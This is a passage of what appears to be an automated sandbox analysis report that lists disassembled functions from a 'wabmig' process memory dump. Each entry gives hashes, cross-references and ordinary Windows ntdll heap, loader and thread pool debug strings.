              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
              • API String ID: 0-1700792311
              • Opcode ID: 105955a781cf2c1c25fc5c624e942c56f9b53e94deb1224ec3974c0f4c22c440
              • Instruction ID: 5cd960e882706acf8d03b9912dcfb3179cdeadb5b453bccc8abd55debc046399
              • Opcode Fuzzy Hash: 105955a781cf2c1c25fc5c624e942c56f9b53e94deb1224ec3974c0f4c22c440
              • Instruction Fuzzy Hash: F0D12335A00A85DFDB12CF74C551AAEBFF5FF4A314F088059E4499B26AD739D981CB20
              Function 2196D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
              Download Yara Rule
              Strings
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2196D2C3
              • @, xrefs: 2196D2AF
              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2196D146
              • Control Panel\Desktop\LanguageConfiguration, xrefs: 2196D196
              • @, xrefs: 2196D0FD
              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2196D0CF
              • @, xrefs: 2196D313
              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2196D262
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
              • API String ID: 0-1356375266
              • Opcode ID: 430b43597c2da99ec38edd01b57c2f4ccb421228718fc09978bfccd9c618c254
              • Instruction ID: bf55e34ae69f5ad782eaff5df10c189f05762c4c797efea89d8b655051b118e9
              • Opcode Fuzzy Hash: 430b43597c2da99ec38edd01b57c2f4ccb421228718fc09978bfccd9c618c254
              • Instruction Fuzzy Hash: B6A14C719083469FE711CF25C580B5BBBECBB89765F00492EE6DC96240E775DA08CBA3
              Function 2196F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
              • API String ID: 0-523794902
              • Opcode ID: cbbe3310e1949e7268528cc5d2fe889c87b00efd27f267fc7a1a2c883e524344
              • Instruction ID: 2158ddb425dd01429aca46f728b367951c0d07aa8350bd7bbcf7da50304fac2e
              • Opcode Fuzzy Hash: cbbe3310e1949e7268528cc5d2fe889c87b00efd27f267fc7a1a2c883e524344
              • Instruction Fuzzy Hash: CD42EE316087829FD305CF28C494F6ABBEDFF89744F1449ADE48A8B252D734E945CB62
              Function 2198B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
              • API String ID: 0-122214566
              • Opcode ID: 1a35d4454d1654cb1ae0d8016a5ddb1aa0bbedb0e58d6cdfd777849e6b71924f
              • Instruction ID: 019ac1ab2b63147b70cf3be3bd4da282e2258c2141e4101f2251b6e09e055d7c
              • Opcode Fuzzy Hash: 1a35d4454d1654cb1ae0d8016a5ddb1aa0bbedb0e58d6cdfd777849e6b71924f
              • Instruction Fuzzy Hash: 81C18E31A0120A9FDB25CF64C891FBE7BA9BF56B10F1980ADDD0E9B291D774C944C391
              Function 219A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
              • API String ID: 0-792281065
              • Opcode ID: f162e0739fb908d8b10adaef48b7059224b160d21d68999f2f6cbd7f20de0181
              • Instruction ID: 8b5c3bdaca8e346203cca363aec53d18b7490388889f246d534dcd0af41b128f
              • Opcode Fuzzy Hash: f162e0739fb908d8b10adaef48b7059224b160d21d68999f2f6cbd7f20de0181
              • Instruction Fuzzy Hash: 0A9136B0A00355DFEB16CF14C898F9A3BE9BF56B64F00006AE61CAB391D7789802C7D1
              Function 21A1F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
              • API String ID: 0-1745908468
              • Opcode ID: 1f9e1467ebea73aefc75031c1224a12ad47fe2dffa7edbb2bf66a1d45ceab7bf
              • Instruction ID: fc89d48057519cd745173e96441b8995f6a959a0aaafcac5022f5a3d6cc079c0
              • Opcode Fuzzy Hash: 1f9e1467ebea73aefc75031c1224a12ad47fe2dffa7edbb2bf66a1d45ceab7bf
              • Instruction Fuzzy Hash: 1C911431A006C1DFDB12CFB8C480A9DBBF2FF5A714F14845EE859AB265DB359945CB20
              Function 2196645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
              Download Yara Rule
              Strings
              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 219C9A2A
              • apphelp.dll, xrefs: 21966496
              • LdrpInitShimEngine, xrefs: 219C99F4, 219C9A07, 219C9A30
              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 219C99ED
              • minkernel\ntdll\ldrinit.c, xrefs: 219C9A11, 219C9A3A
              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 219C9A01
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
              • API String ID: 0-204845295
              • Opcode ID: 412e7a5642472693f6a627732af66fec1a777ef5d1df77362613b57b78217f21
              • Instruction ID: c44150560deb089d37d985b2a88f6cd32d9c1d0bb15c34d3aa2d342b0f4238f7
              • Opcode Fuzzy Hash: 412e7a5642472693f6a627732af66fec1a777ef5d1df77362613b57b78217f21
              • Instruction Fuzzy Hash: 3C519E71208345AFD715CF24C891F9B77ECAB89B44F10091DF59D9B1A0D630E905CBA3
              Function 2199F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
              Download Yara Rule
              Strings
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 219E02E7
              • RTL: Re-Waiting, xrefs: 219E031E
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 219E02BD
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
              • API String ID: 0-2474120054
              • Opcode ID: 18314869ed71b4eeb574f3e0f207e46f1bafe4d4758d04cbe0fe36ff3ee9cb8c
              • Instruction ID: 633b4f969cac0f7e1e938d2f9e8914dc836c6532df01fa2ff49fbf3cf35ef47b
              • Opcode Fuzzy Hash: 18314869ed71b4eeb574f3e0f207e46f1bafe4d4758d04cbe0fe36ff3ee9cb8c
              • Instruction Fuzzy Hash: DCE19E316047419FD712CF28C884B5ABBE8BB85314F140AAEF9AD8B2E1D774D945CB52
              Function 219951EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
              Download Yara Rule
              Strings
              • WindowsExcludedProcs, xrefs: 2199522A
              • Kernel-MUI-Language-Disallowed, xrefs: 21995352
              • Kernel-MUI-Number-Allowed, xrefs: 21995247
              • Kernel-MUI-Language-Allowed, xrefs: 2199527B
              • Kernel-MUI-Language-SKU, xrefs: 2199542B
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              • Opcode ID: 5b10dc9b9c75bbac8241256ee8a7c788b80163a72d73e49b249ccb8958930a6b
              • Instruction ID: f146482cb6c6e714f00d4889cf315a950ebffed9ef371ea91da54b5082e38873
              • Opcode Fuzzy Hash: 5b10dc9b9c75bbac8241256ee8a7c788b80163a72d73e49b249ccb8958930a6b
              • Instruction Fuzzy Hash: 60F14A72D10219EFEB11DFA9C980E9FBBBDBF49710F1140AAE509E7210E6709E00CB90
              Function 219B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 219B2DF0: LdrInitializeThunk.NTDLL ref: 219B2DFA
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0BA3
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0BB6
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0D60
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0D74
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
              • String ID:
              • API String ID: 1404860816-0
              • Opcode ID: 4b6e95a2acf32d1b73f6ff490a857781f28fa73962d01949f43fe7422c1fa23e
              • Instruction ID: 7250952d9e2f0c93b57efb7c7d338636e161790e7ece11934bc4fcbf06c29ed4
              • Opcode Fuzzy Hash: 4b6e95a2acf32d1b73f6ff490a857781f28fa73962d01949f43fe7422c1fa23e
              • Instruction Fuzzy Hash: B9424971900715DFDB21CF64C884B9AB7F9FF45310F1445AAE98DAB242E770AA84CF61
              Function 2199D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
              • API String ID: 0-1975516107
              • Opcode ID: 4a2a63d039250c16af3728ff5ae02dbc6810d02a67e4203fdb2908431dbce253
              • Instruction ID: 8cd373d65b20f83240fbbd6070b05c8454418e90c87372945088d7dc613ca8be
              • Opcode Fuzzy Hash: 4a2a63d039250c16af3728ff5ae02dbc6810d02a67e4203fdb2908431dbce253
              • Instruction Fuzzy Hash: 27511FB1A00386DFDB04DFA9C4D0B8EBBF2BF59344F204099C50C6B292C776A946CB91
              Function 219870C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              • Opcode ID: 79e7c0ed2bb3f675a7e0796534fa8f3985afd0a78d5425af3dfa8fcd2e9f92c1
              • Instruction ID: 13be2b7e96c31a03c0a9829b698f5a62e1092c71b4c354a63cf2c38dc447e0c0
              • Opcode Fuzzy Hash: 79e7c0ed2bb3f675a7e0796534fa8f3985afd0a78d5425af3dfa8fcd2e9f92c1
              • Instruction Fuzzy Hash: DA13AE70A00656CFDB19CF68C480BA9BBF5FF4A304F1581ADD949AB382D735A945CFA0
              Function 21981070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
              • API String ID: 0-3570731704
              • Opcode ID: b81bc919041f5ffc27b3f15309761f48744b80350496c86df7d2f1819fd28d45
              • Instruction ID: 7047496590a092d4ab36d6323e049b151ae6ee3d638b8a320b0ee26e5f02a39e
              • Opcode Fuzzy Hash: b81bc919041f5ffc27b3f15309761f48744b80350496c86df7d2f1819fd28d45
              • Instruction Fuzzy Hash: 85925871A01269CFEB25CF28C840F99B7B9BF46314F1681EAE94DA7291D7349E80CF51
              Function 2197A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
              • API String ID: 0-379654539
              • Opcode ID: dcfc707cd20eb9c1b64a7faceabd58033a551356ce92b6c208283ca263308cda
              • Instruction ID: 2be64149bd70d7f398e9aaf0afa3386462b1a445907876f5adf2138d53a76b4c
              • Opcode Fuzzy Hash: dcfc707cd20eb9c1b64a7faceabd58033a551356ce92b6c208283ca263308cda
              • Instruction Fuzzy Hash: A3C16AB5608382CFD711CF64C940B5AB7F8BF85B04F0489AEF9998B251E735CA46CB52
              Function 219A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
              Download Yara Rule
              Strings
              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 219A855E
              • @, xrefs: 219A8591
              • LdrpInitializeProcess, xrefs: 219A8422
              • minkernel\ntdll\ldrinit.c, xrefs: 219A8421
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
              • API String ID: 0-1918872054
              • Opcode ID: e623e8a65851c6060594ce9dcf0bb66e6039129dcd8c27a399883674cd0f285d
              • Instruction ID: 9f4828b7515911caf8b6454d76aff7b889c31a85f4e8cb48b8f2dcaad0ad72d0
              • Opcode Fuzzy Hash: e623e8a65851c6060594ce9dcf0bb66e6039129dcd8c27a399883674cd0f285d
              • Instruction Fuzzy Hash: 07916C71508345AFE722DF61C844EABBAECFF85745F40097EFA8C96151E734DA088B92
              Function 219764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
              Download Yara Rule
              Strings
              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 219D10AE
              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 219D106B
              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 219D0FE5
              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 219D1028
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
              • API String ID: 0-1468400865
              • Opcode ID: d10706d28454726972f6b4f4a6c357ae853719e8e78f85f24457c7d31c1d7bd6
              • Instruction ID: 15e35e44f16acef894c08d2e337028b2b81cd9530ae9ddb5aaccde06bff12f4b
              • Opcode Fuzzy Hash: d10706d28454726972f6b4f4a6c357ae853719e8e78f85f24457c7d31c1d7bd6
              • Instruction Fuzzy Hash: 6871AAB2904345AFE711DF14C884F8B7BACAF96760F4004A9F94C8B246D734D689DBD2
              Function 21A211A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
              • API String ID: 0-336120773
              • Opcode ID: 6efad6722268fde8fa39a745ff9b501a457492a45331fa2b638f3c4b771b2779
              • Instruction ID: 0b5732204cc7e2bd692577ce6bfb89c13c08965137e23a376c0db69c40abd28b
              • Opcode Fuzzy Hash: 6efad6722268fde8fa39a745ff9b501a457492a45331fa2b638f3c4b771b2779
              • Instruction Fuzzy Hash: C331E0B2600951EFE711CBA8C880F5A77ECFF4A764F14007AF505DB291EA31AD44CBA5
              Function 2199245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
              Download Yara Rule
              Strings
              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 219DA992
              • apphelp.dll, xrefs: 21992462
              • LdrpDynamicShimModule, xrefs: 219DA998
              • minkernel\ntdll\ldrinit.c, xrefs: 219DA9A2
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
              • API String ID: 0-176724104
              • Opcode ID: dccfa5e04e21b6e6a66048ad883666e8b0f37ec4edd1d2e65b751678449cec5a
              • Instruction ID: 453a1c32687ff390c454f1595b29502d85a395457ac459091a8128555e1979d8
              • Opcode Fuzzy Hash: dccfa5e04e21b6e6a66048ad883666e8b0f37ec4edd1d2e65b751678449cec5a
              • Instruction Fuzzy Hash: 95317CBAA40242FFDB12EF69C890E9A77BDFF85B40F114059E91C67261C7789953CB80
              Function 21969148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
              • API String ID: 0-1391187441
              • Opcode ID: c6b6efd879d2cf6d2e297cc67a014b3cf3e247932fabb7b6243be334ef0f4248
              • Instruction ID: b153abd70c8fbe27b0ed48b8ef879a6147eef43e03b612965e122f0bab24efc8
              • Opcode Fuzzy Hash: c6b6efd879d2cf6d2e297cc67a014b3cf3e247932fabb7b6243be334ef0f4248
              • Instruction Fuzzy Hash: 7B31A032A00145EFD711CF99C884F9AB7FCEF49765F2140A9E959AB291D730E940CA61
              Function 21A194E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: $ $0
              • API String ID: 0-3352262554
              • Opcode ID: cf843a15ab8113432397d903eee13a45358a93436ce064bcfbc664f5057c741c
              • Instruction ID: f3eb412452c231c743c9599a5dd718f773e447fb65ad1eaae6fa511c5f14b484
              • Opcode Fuzzy Hash: cf843a15ab8113432397d903eee13a45358a93436ce064bcfbc664f5057c741c
              • Instruction Fuzzy Hash: FB3220B16083818FE350CF68C984B9BBBE5BF88344F04492EF999C7294D775E949CB52
              Function 21971460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
              Download Yara Rule
              Strings
              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 21971728
              • HEAP[%wZ]: , xrefs: 21971712
